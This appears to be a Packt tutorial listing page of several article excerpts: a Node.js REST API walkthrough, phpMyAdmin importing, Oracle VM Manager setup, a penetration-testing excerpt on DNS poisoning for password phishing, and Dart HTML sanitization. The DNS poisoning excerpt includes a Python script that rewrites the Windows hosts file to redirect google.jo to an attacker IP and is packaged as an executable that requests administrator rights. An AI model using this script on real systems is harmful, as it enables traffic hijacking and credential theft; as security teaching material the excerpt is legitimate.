Go ahead and install your preference. If you install the application as the standalone packaged app, an icon to launch it will be added to your dock or taskbar. If you installed it as a regular browser app, you can launch it by opening a new tab in Google Chrome and going to Apps and finding the Postman REST Client icon. After you've installed and launched the app, you should be presented with an output similar to the following screenshot: A quick tour of Postman REST Client Using Postman REST Client, we're able to submit REST API calls to any endpoint we want as well as modify the type of request. Then, we can have complete access to the data that's returned from the API as well as any errors that might have occurred. To test an API call, enter the URL to your favorite website in the Enter request URL here field and leave the dropdown next to it as GET. This will mimic a standard GET request that your browser performs anytime you visit a website. Click on the blue Send button. The request is made and the response is displayed at the bottom half of the screen. In the following screenshot, I sent a simple GET request to http://kroltech.com and the HTML is returned as follows: If we change this URL to that of the RSS feed URL for my website, you can see the XML returned: The XML view has a few more features as it exposes the sidebar to the right that gives you a handy outline to glimpse the tree structure of the XML data. Not only that, you can now see a history of the requests we've made so far along the left sidebar. This is great when we're doing more advanced POST or PUT requests and don't want to repeat the data setup for each request while testing an endpoint. Here is a sample API endpoint I submitted a GET request to that returns the JSON data in its response: A really nice thing about making API calls to endpoints that return JSON using Postman Client is that it parses and displays the JSON in a very nicely formatted way, and each node in the data is expandable and collapsible. The app is very intuitive so make sure you spend some time playing around and experimenting with different types of calls to different URLs. Using the JSONView Chrome extension There is one other tool I want to let you know about (while extremely minor) that is actually a really big deal. The JSONView Chrome extension is a very small plugin that will instantly convert any JSON you view directly via the browser into a more usable JSON tree (exactly like Postman Client). Here is an example of pointing to a URL that returns JSON from Chrome before JSONView is installed: And here is that same URL after JSONView has been installed: You should install the JSONView Google Chrome extension the same way you installed Postman REST Client—access the Chrome Web Store and perform a search for JSONView. Now that you have the tools to be able to easily work with and test API endpoints, let's take a look at writing your own and handling the different request types. Creating a Basic API server Let's create a super basic Node.js server using Express that we'll use to create our own API. Then, we can send tests to the API using Postman REST Client to see how it all works. In a new project workspace, first install the npm modules that we're going to need in order to get our server up and running: $ npm init $ npm install --save express body-parser underscore Now that the package.json file for this project has been initialized and the modules installed, let's create a basic server file to bootstrap up an Express server. Create a file named server.js and insert the following block of code: var express = require('express'),    bodyParser = require('body-parser'),    _ = require('underscore'), json = require('./movies.json'),    app = express();   app.set('port', process.env.PORT || 3500);   app.use(bodyParser.urlencoded()); app.use(bodyParser.json());   var router = new express.Router(); // TO DO: Setup endpoints ... app.use('/', router);   var server = app.listen(app.get('port'), function() {    console.log('Server up: http://localhost:' + app.get('port')); }); Most of this should look familiar to you. In the server.js file, we are requiring the express, body-parser, and underscore modules. We're also requiring a file named movies.json, which we'll create next. After our modules are required, we set up the standard configuration for an Express server with the minimum amount of configuration needed to support an API server. Notice that we didn't set up Handlebars as a view-rendering engine because we aren't going to be rendering any HTML with this server, just pure JSON responses. Creating sample JSON data Let's create the sample movies.json file that will act as our temporary data store (even though the API we build for the purposes of demonstration won't actually persist data beyond the app's life cycle): [{    "Id": "1",    "Title": "Aliens",    "Director": "James Cameron",    "Year": "1986",    "Rating": "8.5" }, {    "Id": "2",    "Title": "Big Trouble in Little China",    "Director": "John Carpenter",    "Year": "1986",    "Rating": "7.3" }, {    "Id": "3",    "Title": "Killer Klowns from Outer Space",    "Director": "Stephen Chiodo",    "Year": "1988",    "Rating": "6.0" }, {    "Id": "4",    "Title": "Heat",    "Director": "Michael Mann",    "Year": "1995",    "Rating": "8.3" }, {    "Id": "5",    "Title": "The Raid: Redemption",    "Director": "Gareth Evans",    "Year": "2011",    "Rating": "7.6" }] This is just a really simple JSON list of a few of my favorite movies. Feel free to populate it with whatever you like. Boot up the server to make sure you aren't getting any errors (note we haven't set up any routes yet, so it won't actually do anything if you tried to load it via a browser): $ node server.js Server up: http://localhost:3500 Responding to GET requests Adding a simple GET request support is fairly simple, and you've seen this before already in the app we built. Here is some sample code that responds to a GET request and returns a simple JavaScript object as JSON. Insert the following code in the routes section where we have the // TO DO: Setup endpoints ... waiting comment: router.get('/test', function(req, res) {    var data = {        name: 'Jason Krol',        website: 'http://kroltech.com'    };      res.json(data); }); Let's tweak the function a little bit and change it so that it responds to a GET request against the root URL (that is /) route and returns the JSON data from our movies file. Add this new route after the /test route added previously: router.get('/', function(req, res) {    res.json(json); }); The res (response) object in Express has a few different methods to send data back to the browser. Each of these ultimately falls back on the base send method, which includes header information, statusCodes, and so on. res.json and res.jsonp will automatically format JavaScript objects into JSON and then send using res.send. res.render will render a template view as a string and then send it using res.send as well. With that code in place, if we launch the server.js file, the server will be listening for a GET request to the / URL route and will respond with the JSON data of our movies collection. Let's first test it out using the Postman REST Client tool: GET requests are nice because we could have just as easily pulled that same URL via our browser and received the same result: However, we're going to use Postman for the remainder of our endpoint testing as it's a little more difficult to send POST and PUT requests using a browser. Receiving data – POST and PUT requests When we want to allow our users using our API to insert or update data, we need to accept a request from a different HTTP verb. When inserting new data, the POST verb is the preferred method to accept data and know it's for an insert. Let's take a look at code that accepts a POST request and data along with the request, and inserts a record into our collection and returns the updated JSON. Insert the following block of code after the route you added previously for GET: router.post('/', function(req, res) {    // insert the new item into the collection (validate first)    if(req.body.Id && req.body.Title && req.body.Director && req.body.Year && req.body.Rating) {        json.push(req.body);        res.json(json);    } else {        res.json(500, { error: 'There was an error!' });    } }); You can see the first thing we do in the POST function is check to make sure the required fields were submitted along with the actual request. Assuming our data checks out and all the required fields are accounted for (in our case every field), we insert the entire req.body object into the array as is using the array's push function. If any of the required fields aren't submitted with the request, we return a 500 error message instead. Let's submit a POST request this time to the same endpoint using the Postman REST Client. (Don't forget to make sure your API server is running with node server.js.): First, we submitted a POST request with no data, so you can clearly see the 500 error response that was returned. Next, we provided the actual data using the x-www-form-urlencoded option in Postman and provided each of the name/value pairs with some new custom data. You can see from the results that the STATUS was 200, which is a success and the updated JSON data was returned as a result. Reloading the main GET endpoint in a browser yields our original movies collection with the new one added. PUT requests will work in almost exactly the same way except traditionally, the Id property of the data is handled a little differently. In our example, we are going to require the Id attribute as a part of the URL and not accept it as a parameter in the data that's submitted (since it's usually not common for an update function to change the actual Id of the object it's updating). Insert the following code for the PUT route after the existing POST route you added earlier: router.put('/:id', function(req, res) {    // update the item in the collection    if(req.params.id && req.body.Title && req.body.Director && req.body.Year && req.body.Rating) {        _.each(json, function(elem, index) {             // find and update:            if (elem.Id === req.params.id) {                elem.Title = req.body.Title;                elem.Director = req.body.Director;                elem.Year = req.body.Year;                elem.Rating = req.body.Rating;            }        });          res.json(json);    } else {        res.json(500, { error: 'There was an error!' });    } }); This code again validates that the required fields are included with the data that was submitted along with the request. Then, it performs an _.each loop (using the underscore module) to look through the collection of movies and find the one whose Id parameter matches that of the Id included in the URL parameter. Assuming there's a match, the individual fields for that matched object are updated with the new values that were sent with the request. Once the loop is complete, the updated JSON data is sent back as the response. Similarly, in the POST request, if any of the required fields are missing, a simple 500 error message is returned. The following screenshot demonstrates a successful PUT request updating an existing record. The response from Postman after including the value 1 in the URL as the Id parameter, which provides the individual fields to update as x-www-form-urlencoded values, and finally sending as PUT shows that the original item in our movies collection is now the original Alien (not Aliens, its sequel as we originally had). Removing data – DELETE The final stop on our whirlwind tour of the different REST API HTTP verbs is DELETE. It should be no surprise that sending a DELETE request should do exactly what it sounds like. Let's add another route that accepts DELETE requests and will delete an item from our movies collection. Here is the code that takes care of DELETE requests that should be placed after the existing block of code from the previous PUT: router.delete('/:id', function(req, res) {    var indexToDel = -1;    _.each(json, function(elem, index) {        if (elem.Id === req.params.id) {            indexToDel = index;        }    });    if (~indexToDel) {        json.splice(indexToDel, 1);    }    res.json(json); }); This code will loop through the collection of movies and find a matching item by comparing the values of Id. If a match is found, the array index for the matched item is held until the loop is finished. Using the array.splice function, we can remove an array item at a specific index. Once the data has been updated by removing the requested item, the JSON data is returned. Notice in the following screenshot that the updated JSON that's returned is in fact no longer displaying the original second item we deleted. Note that ~ in there! That's a little bit of JavaScript black magic! The tilde (~) in JavaScript will bit flip a value. In other words, take a value and return the negative of that value incremented by one, that is ~n === -(n+1). Typically, the tilde is used with functions that return -1 as a false response. By using ~ on -1, you are converting it to a 0. If you were to perform a Boolean check on -1 in JavaScript, it would return true. You will see ~ is used primarily with the indexOf function and jQuery's $.inArray()—both return -1 as a false response. All of the endpoints defined in this article are extremely rudimentary, and most of these should never ever see the light of day in a production environment! Whenever you have an API that accepts anything other than GET requests, you need to be sure to enforce extremely strict validation and authentication rules. After all, you are basically giving your users direct access to your data. Consuming external APIs from Node.js There will undoubtedly be a time when you want to consume an API directly from within your Node.js code. Perhaps, your own API endpoint needs to first fetch data from some other unrelated third-party API before sending a response. Whatever the reason, the act of sending a request to an external API endpoint and receiving a response can be done fairly easily using a popular and well-known npm module called Request. Request was written by Mikeal Rogers and is currently the third most popular and (most relied upon) npm module after async and underscore. Request is basically a super simple HTTP client, so everything you've been doing with Postman REST Client so far is basically what Request can do, only the resulting data is available to you in your node code as well as the response status codes and/or errors, if any. Consuming an API endpoint using Request Let's do a neat trick and actually consume our own endpoint as if it was some third-party external API. First, we need to ensure we have Request installed and can include it in our app: $ npm install --save request Next, edit server.js and make sure you include Request as a required module at the start of the file: var express = require('express'),    bodyParser = require('body-parser'),    _ = require('underscore'),    json = require('./movies.json'),    app = express(),    request = require('request'); Now let's add a new endpoint after our existing routes, which will be an endpoint accessible in our server via a GET request to /external-api. This endpoint, however, will actually consume another endpoint on another server, but for the purposes of this example, that other server is actually the same server we're currently running! The Request module accepts an options object with a number of different parameters and settings, but for this particular example, we only care about a few. We're going to pass an object that has a setting for the method (GET, POST, PUT, and so on) and the URL of the endpoint we want to consume. After the request is made and a response is received, we want an inline callback function to execute. Place the following block of code after your existing list of routes in server.js: router.get('/external-api', function(req, res) {    request({            method: 'GET',            uri: 'http://localhost:' + (process.env.PORT || 3500),        }, function(error, response, body) {             if (error) { throw error; }              var movies = [];            _.each(JSON.parse(body), function(elem, index) {                movies.push({                    Title: elem.Title,                    Rating: elem.Rating                });            });            res.json(_.sortBy(movies, 'Rating').reverse());        }); }); The callback function accepts three parameters: error, response, and body. The response object is like any other response that Express handles and has all of the various parameters as such. The third parameter, body, is what we're really interested in. That will contain the actual result of the request to the endpoint that we called. In this case, it is the JSON data from our main GET route we defined earlier that returns our own list of movies. It's important to note that the data returned from the request is returned as a string. We need to use JSON.parse to convert that string to actual usable JSON data. Using the data that came back from the request, we transform it a little bit. That is, we take that data and manipulate it a bit to suit our needs. In this example, we took the master list of movies and just returned a new collection that consists of only the title and rating of each movie and then sorts the results by the top scores. Load this new endpoint by pointing your browser to http://localhost:3500/external-api, and you can see the new transformed JSON output to the screen. Let's take a look at another example that's a little more real world. Let's say that we want to display a list of similar movies for each one in our collection, but we want to look up that data somewhere such as www.imdb.com. Here is the sample code that will send a GET request to IMDB's JSON API, specifically for the word aliens, and returns a list of related movies by the title and year. Go ahead and place this block of code after the previous route for external-api: router.get('/imdb', function(req, res) {    request({            method: 'GET',            uri: 'http://sg.media-imdb.com/suggests/a/aliens.json',        }, function(err, response, body) {            var data = body.substring(body.indexOf('(')+1);            data = JSON.parse(data.substring(0,data.length-1));            var related = [];            _.each(data.d, function(movie, index) {                related.push({                    Title: movie.l,                    Year: movie.y,                    Poster: movie.i ? movie.i[0] : ''                });            });              res.json(related);        }); }); If we take a look at this new endpoint in a browser, we can see the JSON data that's returned from our /imdb endpoint is actually itself retrieving and returning data from some other API endpoint: Note that the JSON endpoint I'm using for IMDB isn't actually from their API, but rather what they use on their homepage when you type in the main search box. This would not really be the most appropriate way to use their data, but it's more of a hack to show this example. In reality, to use their API (like most other APIs), you would need to register and get an API key that you would use so that they can properly track how much data you are requesting on a daily or an hourly basis. Most APIs will to require you to use a private key with them for this same reason. Summary In this article, we took a brief look at how APIs work in general, the RESTful API approach to semantic URL paths and arguments, and created a bare bones API. We used Postman REST Client to interact with the API by consuming endpoints and testing the different types of request methods (GET, POST, PUT, and so on). You also learned how to consume an external API endpoint by using the third-party node module Request. Resources for Article: Further resources on this subject: RESTful Services JAX-RS 2.0 [Article] REST – Where It Begins [Article] RESTful Web Services – Server-Sent Events (SSE) [Article]
Read more
  • 0
  • 0
  • 5977

article-image-importing-structure-and-data-using-phpmyadmin
Packt
12 Oct 2009
9 min read
Save for later

Importing Structure and Data Using phpMyAdmin

Packt
12 Oct 2009
9 min read
A feature was added in version 2.11.0: an import file may contain the DELIMITER keyword. This enables phpMyAdmin to mimic the mysql command-line interpreter. The DELIMITER separator is used to delineate the part of the file containing a stored procedure, as these procedures can themselves contain semicolons. The default values for the Import interface are defined in $cfg['Import']. Before examining the actual import dialog, let's discuss some limits issues. Limits for the transfer When we import, the source file is usually on our client machine; so, it must travel to the server via HTTP. This transfer takes time and uses resources that may be limited in the web server's PHP configuration. Instead of using HTTP, we can upload our file to the server using a protocol such as FTP, as described in the Web Server Upload Directories section. This method circumvents the web server's PHP upload limits. Time limits First, let's consider the time limit. In config.inc.php, the $cfg['ExecTimeLimit'] configuration directive assigns, by default, a maximum execution time of 300 seconds (five minutes) for any phpMyAdmin script, including the scripts that process data after the file has been uploaded. A value of 0 removes the limit, and in theory, gives us infinite time to complete the import operation. If the PHP server is running in safe mode, modifying $cfg['ExecTimeLimit'] will have no effect. This is because the limits set in php.ini or in user-related web server configuration file (such as .htaccess or virtual host configuration files) take precedence over this parameter. Of course, the time it effectively takes, depends on two key factors: Web server load MySQL server load The time taken by the file, as it travels between the client and the server,does not count as execution time because the PHP script starts to execute only once the file has been received on the server. Therefore, the $cfg['ExecTimeLimit'] parameter has an impact only on the time used to process data (like decompression or sending it to the MySQL server). Other limits The system administrator can use the php.ini file or the web server's virtual host configuration file to control uploads on the server. The upload_max_filesize parameter specifies the upper limit or the maximum file size that can be uploaded via HTTP. This one is obvious, but another less obvious parameter is post_max_size. As HTTP uploading is done via the POST method, this parameter may limit our transfers. For more details about the POST method, please refer to http://en.wikipedia.org/wiki/Http#Request_methods. The memory_limit parameter is provided to avoid web server child processes from grabbing too much of the server memory—phpMyAdmin also runs as a child process. Thus, the handling of normal file uploads, especially compressed dumps, can be compromised by giving this parameter a small value. Here, no preferred value can be recommended; the value depends on the size of uploaded data. The memory limit can also be tuned via the $cfg['MemoryLimit'] parameter in config.inc.php. Finally, file uploads must be allowed by setting file_uploads to On. Otherwise, phpMyAdmin won't even show the Location of the textfile dialog. It would be useless to display this dialog, as the connection would be refused later by the PHP component of the web server. Partial imports If the file is too big, there are ways in which we can resolve the situation. If we still have access to the original data, we could use phpMyAdmin to generate smaller CSV export files, choosing the Dump n rows starting at record # n dialog. If this were not possible, we will have to use a text editor to split the file into smaller sections. Another possibility is to use the upload directory mechanism, which accesses the directory defined in $cfg['UploadDir']. This feature is explained later in this article. In recent phpMyAdmin versions, the Partial import feature can also solve this file size problem. By selecting the Allow interrupt… checkbox, the import process will interrupt itself if it detects that it is close to the time limit. We can also specify a number of queries to skip from the start, in case we successfully import a number of rows and wish to continue from that point. Temporary directory On some servers, a security feature called open_basedir can be set up in a way that impedes the upload mechanism. In this case, or for any other reason, when uploads are problematic, the $cfg['TempDir'] parameter can be set with the value of a temporary directory. This is probably a subdirectory of phpMyAdmin's main directory, into which the web server is allowed to put the uploaded file. Importing SQL files Any file containing MySQL statements can be imported via this mechanism. The dialog is available in the Database view or the Table view, via the Import subpage, or in the Query window. There is no relation between the currently selected table (here author) and the actual contents of the SQL file that will be imported. All the contents of the SQL file will be imported, and it is those contents that determine which tables or databases are affected. However, if the imported file does not contain any SQL statements to select a database, all statements in the imported file will be executed on the currently selected database. Let's try an import exercise. First, we make sure that we have a current SQL export of the book table. This export file must contain the structure and the data. Then we drop the book table—yes, really! We could also simply rename it. Now it is time to import the file back. We should be on the Import subpage, where we can see the Location of the text file dialog. We just have to hit the Browse button and choose our file. phpMyAdmin is able to detect which compression method (if any) has been applied to the file. Depending on the phpMyAdmin version, and the extensions that are available in the PHP component of the web server, there is variation in the formats that the program can decompress. However, to import successfully, phpMyAdmin must be informed of the character set of the file to be imported. The default value is utf8. However, if we know that the import file was created with another character set, we should specify it here. An SQL compatibility mode selector is available at import time. This mode should be adjusted to match the actual data that we are about to import, according to the type of the server where the data was previously exported. To start the import, we click Go. The import procedure continues and we receive a message: Import has been successfully finished, 2 queries executed. We can browse our newly-created tables to confirm the success of the import operation. The file could be imported for testing in a different database or even in a MySQL server. Importing CSV files In this section, we will examine how to import CSV files. There are two possible methods—CSV and CSV using LOAD DATA. The first method is implemented internally by phpMyAdmin and is the recommended one for its simplicity. With the second method, phpMyAdmin receives the file to be loaded, and passes it to MySQL. In theory, this method should be faster. However, it has more requirements due to MySQL itself (see the Requirements sub-section of the CSV using LOAD DATA section). Differences between SQL and CSV formats There are some differences between these two formats. The CSV file format contains data only, so we must already have an existing table in place. This table does not need to have the same structure as the original table (from which the data comes); the Column names dialog enables us to choose which columns are affected in the target table. Because the table must exist prior to the import, the CSV import dialog is available only from the Import subpage in the Table view, and not in the Database view.   Exporting a test file Before trying an import, let's generate an author.csv export file from the author table. We use the default values in the CSV export options. We can then Empty the author table—we should avoid dropping this table because we still need the table structure. CSV From the author table menu, we select Import and then CSV. We can influence the behavior of the import in a number of ways. By default, importing does not modify existing data (based on primary or unique keys). However, the Replace table data with file option instructs phpMyAdmin to use REPLACE statement instead of INSERT statement, so that existing rows are replaced with the imported data. Using Ignore duplicate rows, INSERT IGNORE statements are generated. These cause MySQL to ignore any duplicate key problems during insertion. A duplicate key from the import file does not replace existing data, and the procedure continues for the next line of CSV data. We can then specify the character that terminates each field, the character that encloses data, and the character that escapes the enclosing character. Usually this is . For example, for a double quote enclosing character, if the data field contains a double quote, it must be expressed as "some data " some other data". For Lines terminated by, recent versions of phpMyAdmin offer the auto choice, which should be tried first as it detects the end-of-line character automatically. We can also specify manually which characters terminate the lines. The usual choice is n for UNIX-based systems, rn for DOS or Windows systems, and r for Mac-based system (up to Mac OS 9). If in doubt, we can use a hexadecimal file editor on our client computer (not part of phpMyAdmin) to examine the exact codes. By default, phpMyAdmin expects a CSV file with the same number of fields and the same field order as the target table. But this can be changed by entering a comma-separated list of column names in Column names, respecting the source file format. For example, let's say our source file contains only the author ID and the author name information: "1","John Smith" "2","Maria Sunshine" We'd have to put id, name in Column names to match the source file. When we click Go, the import is executed and we get a confirmation. We might also see the actual INSERT queries generated if the total size of the file is not too big. Import has been successfully finished, 2 queries executed.INSERT INTO `author` VALUES ('1', 'John Smith', '+01 445 789-1234')# 1 row(s) affected.INSERT INTO `author` VALUES ('2', 'Maria Sunshine', '333-3333')# 1 row(s) affected.
Read more
  • 0
  • 0
  • 5975

article-image-oracle-vm-management
Packt
16 Oct 2009
6 min read
Save for later

Oracle VM Management

Packt
16 Oct 2009
6 min read
Before we get to manage the VMs in the Oracle VM Manager, let's take a quick look at the Oracle VM Manager by logging into it. Getting started with Oracle VM Manager In this article, we will perform the following actions while exploring the Oracle VM Manager: Registering an account Logging in to Oracle VM Manager Create a Server Pool After we are done with the Oracle VM Manager installation, we will use one of the following links to log on to the Oracle VM Manager: Within the local machine: http://127.0.0.1:8888/OVS Logging in remotely: http://vmmgr:8888/OVS Here, vmmgr refers to the host name or IP address of your Oracle VM Manager host. How to register an account Registering of an account can be done in several ways. If, during the installation of Oracle VM Manager, we have chosen to configure the default admin account "admin", then we can use this account directly to log on to Oracle's IntraCloud portal we call Oracle VM Manager. We will explain later in detail about the user accounts and why we would need separate accounts for separate roles for fine-grained access control; something that is crucial for security purposes. So let's have a quick look at the three available options: Default installation: This option applies if we have performed the default installation ourselves and have gone ahead to create the account ourselves. Here we have the default administrator role. Request for account creation: Contacting the administrator of Oracle VM Manager is another way to attain an account with the privileges, such as administrator, manager, and user. Create yourself: If we need to conduct basic functions of a common user with operator's role such as creating and using virtual machines, or importing resources, we can create a new account ourselves. However, we will need the administrator to assign us the server pools and groups to our account before we can get started. Here by default we are granted a user role. We will talk more about roles later in this article. Now let's go about registering a new account with Oracle VM Manager. Once on the Oracle VM Manager Login page click on the Register link. We are presented with the following screen. We must enter a Username of our choice and a hard-to-crack password twice. Also, we have to fill in our First Name and Last Name and complete the registration with a valid email address. Click Next: Next, we need to confirm our account details by clicking on the Confirm button. Now our account will be created and a confirmation message is displayed on the Oracle VM Manager Login screen. It should be noted that we will need some Server Pools and groups before we can get started. We will have to ask the administrator to assign us access to those pools and groups. It's time now to login to our newly created account. Logging in to Oracle VM Manager Again we will need to either access the URL locally by typing http://127.0.0.1:8888/OVS or by typing the following: http://hostname:8888/ OVS. If we are accessing the Oracle VM Manager Portal remotely, replace the "hostname" with either the FQDN (Fully Qualified Distinguished Name) if the machine is registered in our DNS or just the hostname of the VM Manager machine. We can login to the portal by simply typing in our Username and Password that we just created. Depending on the role and the server pools that we have been assigned, we will be displayed with the tabs upon the screen as shown in the following table. To change the role, we will need to contact our enterprise domain administrator. Only administrators are allowed to change the roles of accounts. If we forget our password, we can click on Forgot Password and on submitting our account name, the password will be sent to the registered email address that we had provided when we registered the account. The following table discusses the assigned tabs that are displayed for each Oracle VM Manager roles:   Role Grants User Virtual Machines, Resources Administrator Virtual Machines, Resources, Servers, Server Pools, Administration Manager Virtual Machines, Resources, Servers, Server Pools   We can obviously change the roles by editing the Profile (on the upper-right section of the portal). As it can be seen in the following screenshot, we have access to the Virtual Machines pane and the Resources pane. We will continue to add Servers to the pool when logged in as admin. Oracle VM management: Managing Server Pool A Server Pool is logically an autonomous region that contains one or more physical servers and the dynamic nature of such pool and pools of pools makes what we call  an infinite Cloud infrastructure. Currently Oracle has its Cloud portal with Amazon but it is very much viable to have an IntraCloud portal or private Cloud where we can run all sorts of Linux and Windows flavors on our Cloud backbone. It eventually rests on the array of SAN, NAS, or other next generation storage substrate on which the VMs reside. We must ensure that we have the following prerequisites properly checked before creating the Virtual Machines on our IntraCloud Oracle VM. Oracle VM Servers: These are available to deploy as Utility Master, Server Master pool, and Virtual Machine Servers. Repositories: Used for Live Migration or Hot Migration of the VMs and for local storage on the Oracle VM Servers. FQDN/IP address of Oracle VM Servers: It is better to have the Oracle VM Servers known as OracleVM01.AVASTU.COM and OracleVM02.AVASTU. COM. This way you don't have to bother about the IP changes or infrastructural relocation of the IntraCloud to another location. Oracle VM Agent passwords: Needed to access the Oracle VM Servers. Let's now go about exploring the designing process of the Oracle VM. Then we will do the following systematically: Creating the Server Pool Editing Server Pool information Search and retrieval within Server Pool Restoring Server Pool Enabling HA Deleting a Server Pool However, we can carry out these actions only as a Manager or an Administrator. But first let's take a look at the decisions on what type of Server Pools will suit us the best and what the architectural considerations could be around building your Oracle VM farm.
Read more
  • 0
  • 0
  • 5965
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at £15.99/month. Cancel anytime
article-image-phish-for-passwords-using-dns-poisoning
Savia Lobo
14 Jun 2018
6 min read
Save for later

Phish for passwords using DNS poisoning [Tutorial]

Savia Lobo
14 Jun 2018
6 min read
Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details, and so on. Hackers or attackers lure customers to share their personal details by sending them e-mails which appear to come form popular organizatons.  In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking. In DNS poisoning, a corrupt Domain Name system data is injected into the DNS resolver's cache. This causes the name server to provide an incorrect result record. Such a method can result into traffic being directed onto hacker's computer system. This article is an excerpt taken from 'Python For Offensive PenTest written by Hussam Khrais.  Password phishing – DNS poisoning One of the easiest ways to manipulate the direction of the traffic remotely is to play with DNS records. Each operating system contains a host file in order to statically map hostnames to specific IP addresses. The host file is a plain text file, which can be easily rewritten as long as we have admin privileges. For now, let's have a quick look at the host file in the Windows operating system. In Windows, the file will be located under C:WindowsSystem32driversetc. Let's have a look at the contents of the host file: If you read the description, you will see that each entry should be located on a separate line. Also, there is a sample of the record format, where the IP should be placed first. Then, after at least one space, the name follows. You will also see that each record's IP address begins first and then we get the hostname. Now, let's see the traffic on the packet level: Open Wireshark on our target machine and start the capture. Filter on the attacker IP address: We have an IP address of 10.10.10.100, which is the IP address of our attacker. We can see the traffic before poisoning the DNS records. You need to click on Apply to complete the process. Open https://www.google.jo/?gws_rd=ssl. Notice that once we ping the name from the command line, the operating system behind the scene will do a DNS lookup: We will get the real IP address. Now, notice what happens after DNS poisoning. For this, close all the windows except the one where the Wireshark application is running. Keep in mind that we should run as admin to be able to modify the host file. Now, even though we are running as an admin, when it comes to running an application you should explicitly do a right-click and then run as admin. Navigate to the directory where the hosts file is located. Execute dir and you will get the hosts file. Run type hosts. You can see the original host here. Now, we will enter the command: echo 10.10.10.100 www.google.jo >> hosts 10.10.100, is the IP address of our Kali machine. So, once the target goes to google.jo, it should be redirected to the attacker machine. Once again verify the host by executing type hosts. Now, after doing a DNS modification, it's always a good thing to flush the DNS cache, just to make sure that we will use the updated record. For this, enter the following command: ipconfig /flushdns Now, watch what happens after DNS poisoning. For this, we will open our browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that on Wireshark the traffic is going to the Kali IP address instead of the real IP address of google.jo. This is because the DNS resolution for google.jo was 10.10.10.100. We will stop the capturing and recover the original hosts file. We will then place that file in the driversetc folder. Now, let's flush the poisoned DNS cache first by running: ipconfig /flushdns Then, open the browser again. We should go to https://www.google.jo/?gws_rd=ssl right now. Now we are good to go! Using Python script Now we'll automate the steps, but this time via a Python script. Open the script and enter the following code: # Python For Offensive PenTest # DNS_Poisoning import subprocess import os os.chdir("C:WindowsSystem32driversetc") # change the script directory to ..etc where the host file is located on windows command = "echo 10.10.10.100 www.google.jo >> hosts" # Append this line to the host file, where it should redirect # traffic going to google.jo to IP of 10.10.10.100 CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) command = "ipconfig /flushdns" # flush the cached dns, to make sure that new sessions will take the new DNS record CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) The first thing we will do is change our current working directory to be the same as the hosts file, and that will be done using the OS library. Then, using subprocesses, we will append a static DNS record, pointing Facebook to 10.10.10.100: the Kali IP address. In the last step, we will flush the DNS record. We can now save the file and export the script into EXE. Remember that we need to make the target execute it as admin. To do that, in the setup file for the py2exe, we will add a new line, as follows: ... windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}], ... So, we have added a new option, specifying that when the target executes the EXE file, we will ask to elevate our privilege into admin. To do this, we will require administrator privileges. Let's run the setup file and start a new capture. Now, I will copy our EXE file onto the desktop. Notice here that we got a little shield indicating that this file needs an admin privilege, which will give us the exact result for running as admin. Now, let's run the file. Verify that the file host gets modified. You will see that our line has been added. Now, open a new session and we will see whether we got the redirection. So, let's start a new capture, and we will add on the Firefox. As you will see, the DNS lookup for google.jo is pointing to our IP address, which is 10.10.10.100. We learned how to carry out password phishing using DNS poisoning. If you've enjoyed reading the post, do check out, Python For Offensive PenTest to learn how to hack passwords and perform a privilege escalation on Windows with practical examples. 12 common malware types you should know Getting started with Digital forensics using Autopsy 5 pen testing rules of engagement: What to consider while performing Penetration testing
Read more
  • 0
  • 0
  • 5963

article-image-handle-web-applications
Packt
20 Oct 2014
13 min read
Save for later

Handle Web Applications

Packt
20 Oct 2014
13 min read
In this article by Ivo Balbaert author of Dart Cookbook, we will cover the following recipes: Sanitizing HTML Using a browser's local storage Using an application cache to work offline Preventing an onSubmit event from reloading the page (For more resources related to this topic, see here.) Sanitizing HTML We've all heard of (or perhaps even experienced) cross-site scripting (XSS) attacks, where evil minded attackers try to inject client-side script or SQL statements into web pages. This could be done to gain access to session cookies or database data, or to get elevated access-privileges to sensitive page content. To verify an HTML document and produce a new HTML document that preserves only whatever tags are designated safe is called sanitizing the HTML. How to do it... Look at the web project sanitization. Run the following script and see how the text content and default sanitization works: See how the default sanitization works using the following code: var elem1 = new Element.html('<div class="foo">content</div>'); document.body.children.add(elem1); var elem2 = new Element.html('<script class="foo">evil content</script><p>ok?</p>'); document.body.children.add(elem2); The text content and ok? from elem1 and elem2 are displayed, but the console gives the message Removing disallowed element <SCRIPT>. So a script is removed before it can do harm. Sanitize using HtmlEscape, which is mainly used with user-generated content: import 'dart:convert' show HtmlEscape; In main(), use the following code: var unsafe = '<script class="foo">evil   content</script><p>ok?</p>'; var sanitizer = const HtmlEscape(); print(sanitizer.convert(unsafe)); This prints the following output to the console: &lt;script class=&quot;foo&quot;&gt;evil   content&lt;&#x2F;script&gt;&lt;p&gt;ok?&lt;&#x2F;p&gt; Sanitize using node validation. The following code forbids the use of a <p> tag in node1; only <a> tags are allowed: var html_string = '<p class="note">a note aside</p>'; var node1 = new Element.html(        html_string,        validator: new NodeValidatorBuilder()          ..allowElement('a', attributes: ['href'])      ); The console prints the following output: Removing disallowed element <p> Breaking on exception: Bad state: No elements A NullTreeSanitizer for no validation is used as follows: final allHtml = const NullTreeSanitizer(); class NullTreeSanitizer implements NodeTreeSanitizer {      const NullTreeSanitizer();      void sanitizeTree(Node node) {} } It can also be used as follows: var elem3 = new Element.html('<p>a text</p>'); elem3.setInnerHtml(html_string, treeSanitizer: allHtml); How it works... First, we have very good news: Dart automatically sanitizes all methods through which HTML elements are constructed, such as new Element.html(), Element.innerHtml(), and a few others. With them, you can build HTML hardcoded, but also through string interpolation, which entails more risks. The default sanitization removes all scriptable elements and attributes. If you want to escape all characters in a string so that they are transformed into HTML special characters (such as ;&#x2F for a /), use the class HTMLEscape from dart:convert as shown in the second step. The default behavior is to escape apostrophes, greater than/less than, quotes, and slashes. If your application is using untrusted HTML to put in variables, it is strongly advised to use a validation scheme, which only covers the syntax you expect users to feed into your app. This is possible because Element.html() has the following optional arguments: Element.html(String html, {NodeValidator validator, NodeTreeSanitizer treeSanitizer}) In step 3, only <a> was an allowed tag. By adding more allowElement rules in cascade, you can allow more tags. Using allowHtml5() permits all HTML5 tags. If you 